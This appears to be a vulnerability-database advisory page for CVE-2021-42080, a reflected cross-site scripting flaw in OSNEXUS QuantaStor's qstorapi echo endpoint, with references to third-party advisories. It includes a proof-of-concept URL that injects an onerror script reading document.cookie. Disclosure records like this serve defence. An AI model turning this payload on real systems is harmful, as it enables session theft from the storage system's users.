Unrated severityNVD Advisory· Published Jul 10, 2023· Updated Sep 22, 2025
Reflected XSS vulnerability in OSNEXUS QuantaStor before 6.0.0.355
CVE-2021-42080
Description
An attacker is able to launch a Reflected XSS attack using a crafted URL.
POC:
Visit the following URL https://<IPADDRESS>:8153/qstorapi/echo?inputMessage=<img%20src=x%20onerror=alert(document.cookie)>
Affected products
1- Range: 0
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
4- csirt.divd.nl/CVE-2021-42080mitrethird-party-advisorytechnical-descriptionexploit
- csirt.divd.nl/DIVD-2021-00020/mitrethird-party-advisory
- www.wbsec.nl/osnexusmitrethird-party-advisorytechnical-description
- www.osnexus.com/products/software-defined-storagemitreproduct
News mentions
0No linked articles in our index yet.